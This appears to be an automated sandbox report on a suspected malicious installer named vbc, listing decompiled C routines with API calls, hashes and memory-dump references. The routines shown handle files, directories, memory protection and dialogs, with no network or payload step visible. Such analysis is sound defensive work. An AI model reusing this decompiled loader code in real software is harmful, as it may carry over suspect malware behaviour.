                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406008(WCHAR* _a4) {
                                                				signed char _t3;
                                                				signed char _t7;
                                                
                                                				_t3 = GetFileAttributesW(_a4); // executed
                                                				_t7 = _t3;
                                                				if(_t7 != 0xffffffff) {
                                                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t7;
                                                			}





                                                0x0040600d
                                                0x00406013
                                                0x00406018
                                                0x00406021
                                                0x00406021
                                                0x0040602a

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405AEB(WCHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}




                                                0x00405af1
                                                0x00405af9
                                                0x00000000
                                                0x00405aff
                                                0x00000000

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060DF(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060e3
                                                0x004060f3
                                                0x004060fb
                                                0x00000000
                                                0x00406102
                                                0x00000000
                                                0x00406104

                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060F3
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060B0(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060b4
                                                0x004060c4
                                                0x004060cc
                                                0x00000000
                                                0x004060d3
                                                0x00000000
                                                0x004060d5

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060C4
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                
                                                				 *0x73285048 = _a4;
                                                				if(_a8 == 1) {
                                                					VirtualProtect(0x7328505c, 4, 0x40, 0x7328504c); // executed
                                                					 *0x7328505c = 0xc2;
                                                					 *0x7328504c = 0;
                                                					 *0x73285054 = 0;
                                                					 *0x73285068 = 0;
                                                					 *0x73285058 = 0;
                                                					 *0x73285050 = 0;
                                                					 *0x73285060 = 0;
                                                					 *0x7328505e = 0;
                                                				}
                                                				return 1;
                                                			}



                                                0x73282a88
                                                0x73282a8d
                                                0x73282a9d
                                                0x73282aa5
                                                0x73282aac
                                                0x73282ab1
                                                0x73282ab6
                                                0x73282abb
                                                0x73282ac0
                                                0x73282ac5
                                                0x73282aca
                                                0x73282aca
                                                0x73282ad2

                                                APIs
                                                • VirtualProtect.KERNELBASE(7328505C,00000004,00000040,7328504C), ref: 73282A9D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 18192501db64f714e11d7cd9f9cd8ca328576567b7c94787a1122f2bb2438a4f
                                                • Instruction ID: 3419202e1bdb5233734e8f4527527fd308e964ab3c7eae402c6495640f95c01a
                                                • Opcode Fuzzy Hash: 18192501db64f714e11d7cd9f9cd8ca328576567b7c94787a1122f2bb2438a4f
                                                • Instruction Fuzzy Hash: E4F0A5F2504380DEC350EF2A84487893FE0B70C308B34C52AE19CEA281E3344084FF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044E5(int _a4) {
                                                				struct HWND__* _t2;
                                                				long _t3;
                                                
                                                				_t2 =  *0x433ed8;
                                                				if(_t2 != 0) {
                                                					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                					return _t3;
                                                				}
                                                				return _t2;
                                                			}





                                                0x004044e5
                                                0x004044ec
                                                0x004044f7
                                                0x00000000
                                                0x004044f7
                                                0x004044fd

                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044CE(int _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                				return _t2;
                                                			}




                                                0x004044dc
                                                0x004044e2

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004034E5(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}




                                                0x004034f3
                                                0x004034f9

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044BB(int _a4) {
                                                				int _t2;
                                                
                                                				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x004044c5
                                                0x004044cb

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E73282B98(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				void* _t28;
                                                				void* _t29;
                                                				int _t33;
                                                				void* _t37;
                                                				void* _t40;
                                                				void* _t45;
                                                				void* _t49;
                                                				signed int _t56;
                                                				void* _t61;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t77;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				void* _t81;
                                                				void* _t87;
                                                				void* _t88;
                                                				void* _t89;
                                                				void* _t90;
                                                				intOrPtr _t93;
                                                				intOrPtr _t94;
                                                
                                                				if( *0x73285050 != 0 && E73282ADB(_a4) == 0) {
                                                					 *0x73285054 = _t93;
                                                					if( *0x7328504c != 0) {
                                                						_t93 =  *0x7328504c;
                                                					} else {
                                                						E732830C0(E73282AD5(), __ecx);
                                                						 *0x7328504c = _t93;
                                                					}
                                                				}
                                                				_t28 = E73282B09(_a4);
                                                				_t94 = _t93 + 4;
                                                				if(_t28 <= 0) {
                                                					L9:
                                                					_t29 = E73282AFD();
                                                					_t72 = _a4;
                                                					_t79 =  *0x73285058;
                                                					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                					 *0x73285058 = _t72;
                                                					E73282AF7();
                                                					_t33 = CloseHandle(??); // executed
                                                					 *0x73285034 = _t33;
                                                					 *0x73285038 = _t79;
                                                					if( *0x73285050 != 0 && E73282ADB( *0x73285058) == 0) {
                                                						 *0x7328504c = _t94;
                                                						_t94 =  *0x73285054;
                                                					}
                                                					_t80 =  *0x73285058;
                                                					_a4 = _t80;
                                                					 *0x73285058 =  *((intOrPtr*)(E73282AFD() + _t80));
                                                					_t37 = E73282AE9(_t80);
                                                					_pop(_t81);
                                                					if(_t37 != 0) {
                                                						_t40 = E73282B09(_t81);
                                                						if(_t40 > 0) {
                                                							_push(_t40);
                                                							_push(E73282B14() + _a4 + _v8);
                                                							_push(E73282B1E());
                                                							if( *0x73285050 <= 0 || E73282ADB(_a4) != 0) {
                                                								_pop(_t88);
                                                								_pop(_t45);
                                                								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                								if(__eflags == 0) {
                                                								}
                                                								asm("loop 0xfffffff5");
                                                							} else {
                                                								_pop(_t89);
                                                								_pop(_t49);
                                                								 *0x7328504c =  *0x7328504c +  *(_t89 + _t49) * 4;
                                                								asm("loop 0xffffffeb");
                                                							}
                                                						}
                                                					}
                                                					_t107 =  *0x73285058;
                                                					if( *0x73285058 == 0) {
                                                						 *0x7328504c = 0;
                                                					}
                                                					E73282B42(_t107, _a4,  *0x73285034,  *0x73285038);
                                                					return _a4;
                                                				}
                                                				_push(E73282B14() + _a4);
                                                				_t56 = E73282B1A();
                                                				_v8 = _t56;
                                                				_t77 = _t28;
                                                				_push(_t68 + _t56 * _t77);
                                                				_t70 = E73282B26();
                                                				_t87 = E73282B22();
                                                				_t90 = E73282B1E();
                                                				_t61 = _t77;
                                                				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                					_push( *((intOrPtr*)(_t70 + _t61)));
                                                				}
                                                				_push( *((intOrPtr*)(_t87 + _t61)));
                                                				asm("loop 0xfffffff1");
                                                				goto L9;
                                                			}

























                                                0x73282ba8
                                                0x73282bb9
                                                0x73282bc6
                                                0x73282bda
                                                0x73282bc8
                                                0x73282bcd
                                                0x73282bd2
                                                0x73282bd2
                                                0x73282bc6
                                                0x73282be3
                                                0x73282be8
                                                0x73282bee
                                                0x73282c32
                                                0x73282c32
                                                0x73282c37
                                                0x73282c3c
                                                0x73282c42
                                                0x73282c44
                                                0x73282c4a
                                                0x73282c57
                                                0x73282c59
                                                0x73282c5e
                                                0x73282c6b
                                                0x73282c7e
                                                0x73282c84
                                                0x73282c8a
                                                0x73282c8b
                                                0x73282c91
                                                0x73282c9d
                                                0x73282ca3
                                                0x73282cab
                                                0x73282cac
                                                0x73282caf
                                                0x73282cba
                                                0x73282cbc
                                                0x73282cc8
                                                0x73282cce
                                                0x73282cd6
                                                0x73282d02
                                                0x73282d03
                                                0x73282d05
                                                0x73282d09
                                                0x73282d09
                                                0x73282d10
                                                0x73282ce6
                                                0x73282ce6
                                                0x73282ce7
                                                0x73282cf5
                                                0x73282cfe
                                                0x73282cfe
                                                0x73282cd6
                                                0x73282cba
                                                0x73282d12
                                                0x73282d19
                                                0x73282d1b
                                                0x73282d1b
                                                0x73282d34
                                                0x73282d42
                                                0x73282d42
                                                0x73282bf9
                                                0x73282bfa
                                                0x73282bff
                                                0x73282c03
                                                0x73282c08
                                                0x73282c1c
                                                0x73282c1d
                                                0x73282c1e
                                                0x73282c20
                                                0x73282c25
                                                0x73282c27
                                                0x73282c27
                                                0x73282c2a
                                                0x73282c30
                                                0x00000000

                                                APIs
                                                • CloseHandle.KERNELBASE(00000000), ref: 73282C57
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 1ef657144265ada7ba89caecc7987b40626885b2f78e7071c69b6852bb5133c2
                                                • Instruction ID: 59cb301e01e44a24428ca593fe932c69135fc46e8443f646d0e4f4e4cf57d30a
                                                • Opcode Fuzzy Hash: 1ef657144265ada7ba89caecc7987b40626885b2f78e7071c69b6852bb5133c2
                                                • Instruction Fuzzy Hash: B54190B250030DDFEB11EF69D988BD97BB9EB48314F34C426E409D61C0D67994C0AB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E732812BB() {
                                                				void* _t3;
                                                
                                                				_t3 = GlobalAlloc(0x40,  *0x7328506c +  *0x7328506c); // executed
                                                				return _t3;
                                                			}




                                                0x732812c5
                                                0x732812cb

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,732812DB,?,7328137F,00000019,732811CA,-000000A0), ref: 732812C5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 6fcd43f00682317228415e08771684b88c5ae402de62d51412d9cbaff8acb8b9
                                                • Instruction ID: f478329390f1e9c3e9af267b28f4bb7edd30c35185d8bed6e2e48c0aa9cfcfd0
                                                • Opcode Fuzzy Hash: 6fcd43f00682317228415e08771684b88c5ae402de62d51412d9cbaff8acb8b9
                                                • Instruction Fuzzy Hash: 00B012B2A00120DFEE00AB65CC0EF7536D4E704301F24C000FA08C0181C12048009536
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				WCHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				WCHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				short* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed short _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr* _t138;
                                                				WCHAR* _t146;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				signed int* _t160;
                                                				struct HWND__* _t166;
                                                				struct HWND__* _t167;
                                                				int _t169;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x42c240; // 0x516114
                                                				_v32 = _t82;
                                                				_t2 = _t82 + 0x3c; // 0x0
                                                				_t3 = _t82 + 0x38; // 0x0
                                                				_t146 = ( *_t2 << 0xb) + 0x436000;
                                                				_v12 =  *_t3;
                                                				if(_a8 == 0x40b) {
                                                					E00405B81(0x3fb, _t146);
                                                					E004067C4(_t146);
                                                				}
                                                				_t167 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E00405B81(0x3fb, _t146);
                                                							if(E00405F14(_t186, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E0040653D(0x42b238, _t146);
                                                							_t87 = E0040690A(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E0040653D(0x42b238, _t146);
                                                								_t89 = E00405EB7(0x42b238);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 = 0;
                                                								}
                                                								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t169 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
